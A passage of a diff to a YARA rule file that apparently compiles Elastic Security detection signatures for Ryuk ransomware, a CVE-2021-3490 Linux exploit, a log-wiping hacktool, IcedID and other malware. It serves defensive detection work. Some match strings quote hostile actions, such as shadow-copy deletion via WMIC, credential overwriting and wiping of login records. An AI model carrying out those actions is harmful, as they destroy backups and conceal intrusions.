"https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L325-L349" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a63d08cd53053bfda17b8707ab3a94cf3d6021097335dc40d5d211fb9faed045" - logic_hash = "08c6c604d1791c35a8494e5ec8a96e8c5dd2ca3d6c57971da20057ce8960fa1d" + id = "72b5fd9d-23db-4f18-88d9-a849ec039135" + date = "2020-04-30" + modified = "2021-08-23" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Ryuk.yar#L90-L109" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "b2abc8f70df5d730ce6a7d0bc125bb623f27b292e7d575914368a8bfc0fb5837" score = 75 - quality = 50 - tags = "FILE, MEMORY" - fingerprint = "2f15ed0bc186b83a298eb51b43f10aa46ce6654ea9312a9529d36fc4cff05d4c" - threat_name = "Windows.Trojan.IcedID" + quality = 75 + tags = "BETA, FILE, MEMORY" + fingerprint = "7c394aa283336013b74a8aaeb56e8363033958b4a1bd8011f3b32cfe2d37e088" + threat_name = "Windows.Ransomware.Ryuk" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57294,33 +58173,28 @@ rule ELASTIC_Windows_Trojan_Icedid_B8C59889 : FILE MEMORY os = "windows" strings: - $a1 = "{%0.8X-%0.4X-%0.4X-%0.4X-%0.4X%0.8X}" wide fullword - $a2 = "\\1.bin" wide fullword - $a3 = "c:\\ProgramData" wide fullword - $a4 = "Loader.dll" ascii fullword - $seq_crypto = { 83 E1 03 83 E0 03 48 8D 14 8A 41 8B 0C 80 4D 8D 04 80 41 0F B6 00 83 E1 07 02 02 41 32 04 29 41 88 04 19 49 FF C1 8B 02 } + $d1 = { 48 2B C3 33 DB 66 89 1C 46 48 83 FF FF 0F } condition: - 4 of ($a*) or 1 of ($seq*) + 1 of ($d*) } -rule ELASTIC_Windows_Trojan_Icedid_81Eff9A3 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Ryuk_8Ba51798 : BETA FILE MEMORY { meta: - description = "IcedID fork core bot loader" + description = "Identifies RYUK ransomware" author = "Elastic Security" - id = "81eff9a3-4c75-48a5-8160-718c9a2d1e14" - date = "2023-05-05" - modified = "2023-06-13" - reference = "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_IcedID.yar#L351-L371" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "96dacdf50d1db495c8395d7cf454aa3a824801cf366ac368fe496f89b5f98fe7" - logic_hash = "923dd8166cce0ec32b3b8b20cad192b3c15b7ce7c17fd44ddda739ad205a6c06" + id = "8ba51798-15d7-4f02-97fa-1844465ae9d8" + date = "2020-04-30" + modified = "2021-08-23" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Ryuk.yar#L111-L137" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "0733ae6a7e38bc2a25aa76a816284482d3ee25626559ec5af554b5f5070e534a" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "f764c4b2a562eb92a7326a45b180da7f930ffcc4f0b88bbd640c2fe7b71f82b6" - threat_name = "Windows.Trojan.IcedID" + tags = "BETA, FILE, MEMORY" + fingerprint = "8e284bc6015502577a6ddd140b9cd110fd44d4d2cb55d0fdec5bebf3356fd7b3" + threat_name = "Windows.Ransomware.Ryuk" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57328,133 +58202,143 @@ rule ELASTIC_Windows_Trojan_Icedid_81Eff9A3 : FILE MEMORY os = "windows" strings: - $a = "E:\\source\\anubis\\int-bot\\x64\\Release\\int-bot.pdb" ascii fullword + $c1 = "/v \"svchos\" /f" wide fullword + $c2 = "cmd /c \"WMIC.exe shadowcopy delet\"" ascii fullword + $c3 = "lsaas.exe" wide fullword + $c4 = "FA_Scheduler" wide fullword + $c5 = "ocautoupds" wide fullword + $c6 = "CNTAoSMgr" wide fullword + $c7 = "hrmlog" wide fullword + $c8 = "UNIQUE_ID_DO_NOT_REMOVE" wide fullword condition: - all of them + 3 of ($c*) } -rule ELASTIC_Multi_Hacktool_Nps_C6Eb4A27 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Ryuk_88Daaf8E : BETA FILE MEMORY { meta: - description = "Detects Multi Hacktool Nps (Multi.Hacktool.Nps)" + description = "Identifies RYUK ransomware" author = "Elastic Security" - id = "c6eb4a27-c481-41b4-914d-a27d10672d30" - date = "2024-01-24" - modified = "2024-01-29" - reference = "https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Multi_Hacktool_Nps.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4714e8ad9c625070ca0a151ffc98d87d8e5da7c8ef42037ca5f43baede6cfac1" - logic_hash = "53baf04f4ab8967761c6badb24f6632cc1bf4a448abf0049318b96855f30feea" + id = "88daaf8e-0bfe-46c4-9a75-2527d0e10538" + date = "2020-04-30" + modified = "2021-08-23" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Ryuk.yar#L139-L158" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "6fc463976c0fb9c3e4f25d854545d07800c63730826f3974298f0077d272cff0" score = 75 - quality = 50 - tags = "FILE, MEMORY" - fingerprint = "1386e4cef0f347b38a4614311d585b0b83cb9526b19215392aee893e594950de" + quality = 75 + tags = "BETA, FILE, MEMORY" + fingerprint = "b1f218a9bc6bf5f3ec108a471de954988e7692de208e68d7d4ee205194cbbb40" + threat_name = "Windows.Ransomware.Ryuk" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "multi" + os = "windows" strings: - $str_info0 = "Reconnecting..." - $str_info1 = "Loading configuration file %s successfully" - $str_info2 = "successful start-up of local socks5 monitoring, port" - $str_info3 = "successful start-up of local tcp monitoring, port" - $str_info4 = "start local file system, local path %s, strip prefix %s ,remote port %" - $str_info5 = "start local file system, local path %s, strip prefix %s ,remote port %s" + $f1 = { 48 8B CF E8 AB 25 00 00 85 C0 74 35 } condition: - all of them + 1 of ($f*) } -rule ELASTIC_Multi_Hacktool_Nps_F76F257D : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2021_3490_D369D615 : FILE MEMORY CVE_2021_3490 { meta: - description = "Detects Multi Hacktool Nps (Multi.Hacktool.Nps)" + description = "Detects Linux Exploit Cve 2021 3490 (Linux.Exploit.CVE-2021-3490)" author = "Elastic Security" - id = "f76f257d-0286-4b4d-9f73-2add23cfd07e" - date = "2024-01-24" - modified = "2024-01-29" - reference = "https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Multi_Hacktool_Nps.yar#L27-L50" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "80721b20a8667536a33fca50236f5c8e0c0d07aa7805b980e40818ab92cd9f4a" - logic_hash = "0bbd7f86bfd2967dc390510c2e403d05e1b56551b965ea716b9e5330f75c9bd5" + id = "d369d615-d2a3-4f9d-b5c7-eb0fac5d43e7" + date = "2021-11-12" + modified = "2022-01-26" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2021_3490.yar#L1-L30" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e65ba616942fd1e893e10898d546fe54458debbc42e0d6826aff7a4bb4b2cf19" + logic_hash = "6fa4b36366d2c255f5ccf0e22a06c7e17df74fddd06963787dbcd713b3e8aca6" score = 75 - quality = 71 - tags = "FILE, MEMORY" - fingerprint = "4aaa270129ce0c8fdd40aae2ebc4f6595aec91cbfea9e0188542e9c3f38eedee" + quality = 75 + tags = "FILE, MEMORY, CVE-2021-3490" + fingerprint = "4f8f4c7fabe32a023f8aafb817e2c27c5a5e0e9246ddccacf99a47f2ab850014" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "multi" + os = "linux" strings: - $string_decrypt_add = { 0F B6 BC 34 ?? ?? ?? ?? 44 0F B6 84 34 ?? ?? ?? ?? 44 01 C7 40 88 BC 34 ?? ?? ?? ?? 48 FF C6 } - $string_decrypt_xor = { 0F B6 54 ?? ?? 0F B6 74 ?? ?? 31 D6 40 88 74 ?? ?? 48 FF C0 } - $string_decrypt_sub = { 0F B6 94 04 ?? ?? ?? ?? 0F B6 B4 04 ?? ?? ?? ?? 29 D6 40 88 B4 04 ?? ?? ?? ?? 48 FF C0 } - $NewJsonDb_str0 = { 63 6C 69 65 6E 74 73 2E 6A 73 6F 6E } - $NewJsonDb_str1 = { 68 6F 73 74 73 2E 6A 73 6F 6E } + $c1 = "frame_dummy_init_array_entry" + $c2 = "leak_oob_map_ptr" + $c3 = "overwrite_cred" + $c4 = "obj_get_info_by_fd" + $c5 = "kernel_write_uint" + $c6 = "search_init_pid_ns_kstrtab" + $c7 = "search_init_pid_ns_ksymtab" + $msg1 = "failed to leak ptr to BPF map" + $msg2 = "preparing to overwrite creds..." + $msg3 = "success! enjoy r00t" + $msg4 = "Useage: %s " + $msg5 = "searching for init_pid_ns in ksymtab" condition: - all of them + 4 of them } -rule ELASTIC_Multi_Trojan_Merlin_32643F4C : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Wipelog_Daea1Aa4 : FILE MEMORY { meta: - description = "Detects Multi Trojan Merlin (Multi.Trojan.Merlin)" + description = "Detects Linux Hacktool Wipelog (Linux.Hacktool.Wipelog)" author = "Elastic Security" - id = "32643f4c-ee47-4ed2-9807-7b85d3f4e095" - date = "2024-03-01" - modified = "2024-05-23" + id = "daea1aa4-0df7-4308-83e1-0707dcda2e54" + date = "2022-03-17" + modified = "2022-07-22" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Multi_Trojan_Merlin.yar#L1-L28" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "84b988c4656677bc021e23df2a81258212d9ceba13be204867ac1d9d706404e2" - logic_hash = "7de2deec0e2c7fd3ce2b42762f88bfe87cb4ffb02b697953aa1716425d6f1612" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Wipelog.yar#L1-L29" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "39b3a95928326012c3b2f64e2663663adde4b028d940c7e804ac4d3953677ea6" + logic_hash = "e2483b7719f4a1e28ec3732120770066333d8db269c9c9711813a8eeb75176d6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bce277ef43c67be52b67c4495652e99d4707975c79cb30b54283db56545278ae" + fingerprint = "93f899e14e6331c2149ba5c0c1e9dd8def5a7d1b6d2a7af66eade991dea77b3c" severity = 100 - arch_context = "x86, arm64" + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "multi" + os = "linux" strings: - $a1 = "json:\"killdate,omitempty\"" - $a2 = "json:\"maxretry,omitempty\"" - $a3 = "json:\"waittime,omitempty\"" - $a4 = "json:\"payload,omitempty\"" - $a5 = "json:\"skew,omitempty\"" - $a6 = "json:\"command\"" - $a7 = "json:\"pid,omitempty\"" - $b1 = "/merlin-agent/commands" - $b2 = "/merlin/pkg/jobs" - $b3 = "github.com/Ne0nd0g/merlin" + $s1 = "Erase one username on tty" + $s2 = "wipe_utmp" + $s3 = "wipe_acct" + $s4 = "wipe_lastlog" + $s5 = "wipe_wtmp" + $s6 = "getpwnam" + $s7 = "ERROR: Can't find user in passwd" + $s8 = "ERROR: Opening tmp ACCT file" + $s9 = "/var/log/wtmp" + $s10 = "/var/log/lastlog" + $s11 = "Patching %s ...." condition: - all of ($a*) or all of ($b*) + 4 of them } -rule ELASTIC_Linux_Ransomware_Sfile_9E347B52 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Iroffer_53692410 : FILE MEMORY { meta: - description = "Detects Linux Ransomware Sfile (Linux.Ransomware.SFile)" + description = "Detects Linux Trojan Iroffer (Linux.Trojan.Iroffer)" author = "Elastic Security" - id = "9e347b52-233a-4956-9f1f-7600c482e280" - date = "2023-07-29" - modified = "2024-02-13" + id = "53692410-4213-4550-890e-4c62867937bc" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_SFile.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "49473adedc4ee9b1252f120ad8a69e165dc62eabfa794370408ae055ec65db9d" - logic_hash = "394571fd5746132d15da97428c3afc149435d91d5432eadf1c838d4a6433c7c1" - score = 75 - quality = 71 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Iroffer.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e76508141970efb3e4709bcff83772da9b10169c599e13e58432257a7bb2defa" + logic_hash = "b8aa25fbde4d9ca36656f583e7601118a06e57703862c8b28b273881eef504fe" + score = 60 + quality = 23 tags = "FILE, MEMORY" - fingerprint = "094af0030d51d1e28405fc02a51ccc1bedf9e083b3d24b82c36f4b397eefbb0b" + fingerprint = "f070ee35ad42d9d30021cc2796cfd2859007201c638f98f42fdbec25c53194fb" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57462,29 +58346,28 @@ rule ELASTIC_Linux_Ransomware_Sfile_9E347B52 : FILE MEMORY os = "linux" strings: - $a1 = { 49 74 27 73 20 6A 75 73 74 20 61 20 62 75 73 69 6E 65 73 73 2E } - $a2 = { 41 6C 6C 20 64 61 74 61 20 69 73 20 70 72 6F 70 65 72 6C 79 20 70 72 6F 74 65 63 74 65 64 20 61 67 61 69 6E 73 74 20 75 6E 61 75 74 68 6F 72 69 7A 65 64 20 61 63 63 65 73 73 20 62 79 20 73 74 65 61 64 79 20 65 6E 63 72 79 70 74 69 6F 6E 20 74 65 63 68 6E 6F 6C 6F 67 79 2E } + $a = { 69 6E 67 20 55 6E 6B 6E 6F 77 6E 20 4D 73 67 6C 6F 67 20 54 61 67 } condition: all of them } -rule ELASTIC_Linux_Exploit_Foda_F41E9Ef9 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Iroffer_013E07De : FILE MEMORY { meta: - description = "Detects Linux Exploit Foda (Linux.Exploit.Foda)" + description = "Detects Linux Trojan Iroffer (Linux.Trojan.Iroffer)" author = "Elastic Security" - id = "f41e9ef9-b280-44cb-b877-ac998eea84d3" - date = "2021-04-06" + id = "013e07de-95bd-4774-a14f-0a10f911a2dd" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Foda.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6059a6dd039b5efa36ce97acbb01406128aaf6062429474e422624ee69783ca8" - logic_hash = "7b15fef304b91601a76c6fcf48a892105d6eedf5a3e2395ab7c2937a84709d9f" - score = 75 - quality = 75 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Iroffer.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e76508141970efb3e4709bcff83772da9b10169c599e13e58432257a7bb2defa" + logic_hash = "ce21de61f94d41aa3abb73b9391a4d9c8ddeea75f1a2b36be58111b70a9590fe" + score = 60 + quality = 25 tags = "FILE, MEMORY" - fingerprint = "d24064932ef3a972970ce446d465c28379bf83b1b72f5bf77d1def3074747a8e" + fingerprint = "92dde62076acec29a637b63a35f00c35f706df84d6ee9cabda0c6f63d01a13c4" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57492,28 +58375,28 @@ rule ELASTIC_Linux_Exploit_Foda_F41E9Ef9 : FILE MEMORY os = "linux" strings: - $a = { C0 50 89 E2 53 89 E1 B0 0B CD 80 31 C0 B0 01 CD } + $a = { 00 49 67 6E 6F 72 69 6E 67 20 42 61 64 20 58 44 43 43 20 4E 6F } condition: all of them } -rule ELASTIC_Linux_Trojan_Ipstorm_3C43D4A7 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Iroffer_0De95Cab : FILE MEMORY { meta: - description = "Detects Linux Trojan Ipstorm (Linux.Trojan.Ipstorm)" + description = "Detects Linux Trojan Iroffer (Linux.Trojan.Iroffer)" author = "Elastic Security" - id = "3c43d4a7-185a-468b-a73d-82f579de98c1" + id = "0de95cab-c671-44f0-a85e-5a5634e906f7" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ipstorm.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5103133574615fb49f6a94607540644689be017740d17005bc08b26be9485aa7" - logic_hash = "c7e9191312197f8925d7231d0b8badf8b5ca35685df909c0d1feb301b4385d7b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Iroffer.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "717bea3902109d1b1d57e57c26b81442c0705af774139cd73105b2994ab89514" + logic_hash = "adec3e1d3110bcc22262d5f1f2ad14a347616f4a809f29170a9fbb5d1669a4c3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "cf6812f8f0ee7951a70bec3839b798a574d536baae4cf37cda6eebf570cab0be" + fingerprint = "42c1ab8af313ec3c475535151ee67cac93ab6a25252b52b1e09c166065fb2760" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57521,28 +58404,28 @@ rule ELASTIC_Linux_Trojan_Ipstorm_3C43D4A7 : FILE MEMORY os = "linux" strings: - $a = { 48 8D 54 24 58 31 F6 EB 11 48 8B 84 24 88 00 00 00 48 89 F1 48 } + $a = { 45 41 52 52 45 43 4F 52 44 53 00 53 68 6F 77 20 49 6E 66 6F } condition: all of them } -rule ELASTIC_Linux_Trojan_Ipstorm_F9269F00 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Iroffer_711259E4 : FILE MEMORY { meta: - description = "Detects Linux Trojan Ipstorm (Linux.Trojan.Ipstorm)" + description = "Detects Linux Trojan Iroffer (Linux.Trojan.Iroffer)" author = "Elastic Security" - id = "f9269f00-4664-47a4-9148-fa74e2cfee7c" + id = "711259e4-f081-4d81-8257-60ba733354c5" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ipstorm.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5103133574615fb49f6a94607540644689be017740d17005bc08b26be9485aa7" - logic_hash = "5914d222b49aaf6c1040e48ffd93c04bd5df25f1d97bde79b034862fca6555f6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Iroffer.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e76508141970efb3e4709bcff83772da9b10169c599e13e58432257a7bb2defa" + logic_hash = "a71dbb979bc1f7671ab9958b6aa502e6ded4ee1c1b026080fd377eb772ebb1d5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "509de41454bcc60dad0d96448592aa20fb997ce46ad8fed5d4bbdbe2ede588d6" + fingerprint = "aca63ef57ab6cb5579a2a5fea6095d88a3a4fb8347353febb3d02cc88a241b78" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57550,28 +58433,28 @@ rule ELASTIC_Linux_Trojan_Ipstorm_F9269F00 : FILE MEMORY os = "linux" strings: - $a = { EC C0 00 00 00 48 89 AC 24 B8 00 00 00 48 8D AC 24 B8 00 00 00 B8 69 00 } + $a = { 03 7E 2B 8B 45 C8 3D FF 00 00 00 77 21 8B 55 CC 81 FA FF 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Ipstorm_08Bcf61C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Iroffer_7478Ddd9 : FILE MEMORY { meta: - description = "Detects Linux Trojan Ipstorm (Linux.Trojan.Ipstorm)" + description = "Detects Linux Trojan Iroffer (Linux.Trojan.Iroffer)" author = "Elastic Security" - id = "08bcf61c-baef-4320-885c-8f8949684dde" + id = "7478ddd9-ebb6-4bd4-a1ad-d0bf8f99ab1d" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ipstorm.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "503f293d84de4f2c826f81a68180ad869e0d1448ea6c0dbf09a7b23801e1a9b9" - logic_hash = "fb2755c04b61d19788a92b8c9c1c9eb2552b62b27011e302840fdcf689b3d9b4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Iroffer.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "20e1509c23d7ef14b15823e4c56b9a590e70c5b7960a04e94b662fc34152266c" + logic_hash = "e650ee830b735a11088b628e865cd40a15054437ca05849f2eaa7838eac152e3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "348295602b1582839f6acc603832f09e9afab71731bc21742d1a638e41df6e7c" + fingerprint = "b497ee116b77e2ba1fedfad90894d956806a2ffa19cadc33a916513199b0a381" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57579,28 +58462,28 @@ rule ELASTIC_Linux_Trojan_Ipstorm_08Bcf61C : FILE MEMORY os = "linux" strings: - $a = { 8C 24 98 00 00 00 31 D2 31 DB EB 04 48 83 C1 18 48 8B 31 48 83 79 } + $a = { 80 FA 0F 74 10 80 FA 16 74 0B 80 FA 1F 74 06 C6 04 1E 2E 89 } condition: all of them } -rule ELASTIC_Windows_Trojan_Hijackloader_A8444812 : FILE MEMORY +rule ELASTIC_Windows_PUP_Mediaarena_A9E3B4A1 : FILE MEMORY { meta: - description = "Detects Windows Trojan Hijackloader (Windows.Trojan.HijackLoader)" + description = "Detects Windows Pup Mediaarena (Windows.PUP.MediaArena)" author = "Elastic Security" - id = "a8444812-6aef-4ed7-a44b-b147301544c8" - date = "2023-11-15" - modified = "2024-01-12" + id = "a9e3b4a1-fd87-4f8f-a9d4-d93f9c018270" + date = "2023-06-02" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_HijackLoader.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "065c379a33ef1539e8a68fd4b7638fe8a30ec19fc128642ed0c68539656374b9" - logic_hash = "6cd88adc7a0d35013a26d1135efb294ee6f9ddab99b4549e82d3d6f5f65509b6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_PUP_MediaArena.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c071e0b67e4c105c87b876183900f97a4e8bc1a7c18e61c028dee59ce690b1ac" + logic_hash = "8e52b29f2848498aae2fd7ad35494362d6c07f0e752b628840a256923aca32c7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "dd9f3bca44b585e3a31626b66223288634fcb092e43ecb053806726e5f2006e9" + fingerprint = "0535228889b1d2a7c317a7ce939621d3d20e2a454ec6d31915c25884931d62b9" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57608,174 +58491,150 @@ rule ELASTIC_Windows_Trojan_Hijackloader_A8444812 : FILE MEMORY os = "windows" strings: - $a1 = { 8B 45 ?? 40 89 45 ?? 8B 45 ?? 3B 45 ?? 73 ?? 8B 45 ?? 03 45 ?? 66 0F BE 00 66 89 45 ?? FF 75 ?? FF 75 ?? 8D 45 ?? 50 E8 [4] 83 C4 0C EB ?? } - $a2 = { 8B 45 ?? 8B 4D ?? 8B [1-5] 0F AF [1-5] 0F B7 [2] 03 C1 8B 4D ?? 89 01 } - $a3 = { 33 C0 40 74 ?? 8B 45 ?? 8B 4D ?? 8B 55 ?? 03 14 81 89 55 ?? FF 75 ?? FF 75 ?? E8 [4] 59 59 89 45 ?? 8B 45 ?? 8B 4D ?? 0F B7 04 41 8B 4D ?? 8B 55 ?? 03 14 81 89 55 ?? 8B 45 ?? 3B 45 ?? 75 ?? 8B 45 ?? EB ?? 8B 45 ?? 40 89 45 ?? EB ?? } - $a4 = { 8B 45 ?? 8B 4D ?? 8B [1-5] 0F AF [1-5] 0F B7 4D ?? 03 C1 8B 4D ?? 89 01 } - $a5 = { 8B 45 ?? 83 C0 04 89 45 ?? 8B 45 ?? 3B 45 ?? 73 ?? 8B 45 ?? 8B 4D ?? 8B 04 81 03 45 ?? 8B 4D ?? 8B 55 ?? 89 04 8A 8B 45 ?? 40 89 45 ?? EB ?? } - $a6 = { 8B 45 ?? 83 C0 04 89 45 ?? 8B 45 ?? 3B 45 ?? 73 ?? 8B 45 ?? 03 45 ?? 89 45 ?? 8B 45 ?? 8B 00 89 45 ?? 8B 45 ?? 33 45 ?? 8B 4D ?? 89 01 EB ?? } + $a1 = "Going to change default browser to be MS Edge ..." wide + $a2 = "https://www.searcharchiver.com/eula" wide + $a3 = "Current default browser is unchanged!" wide + $a4 = "You can terminate your use of the Search Technology and Search Technology services" + $a5 = "The software may also offer to change your current web navigation access points" + $a6 = "{{BRAND_NAME}} may have various version compatible with different platform," + $a7 = "{{BRAND_NAME}} is a powerful search tool" wide condition: - 3 of them + 2 of them } -rule ELASTIC_Windows_Hacktool_Seatbelt_674Fd535 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Minertr_9901E275 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Seatbelt (Windows.Hacktool.Seatbelt)" + description = "Detects Linux Cryptominer Minertr (Linux.Cryptominer.Minertr)" author = "Elastic Security" - id = "674fd535-f188-4b20-8b5e-69a111bf08e5" - date = "2022-10-20" - modified = "2022-11-24" + id = "9901e275-3053-47ea-8c36-6c9271923b64" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_Seatbelt.yar#L1-L26" - license_url = 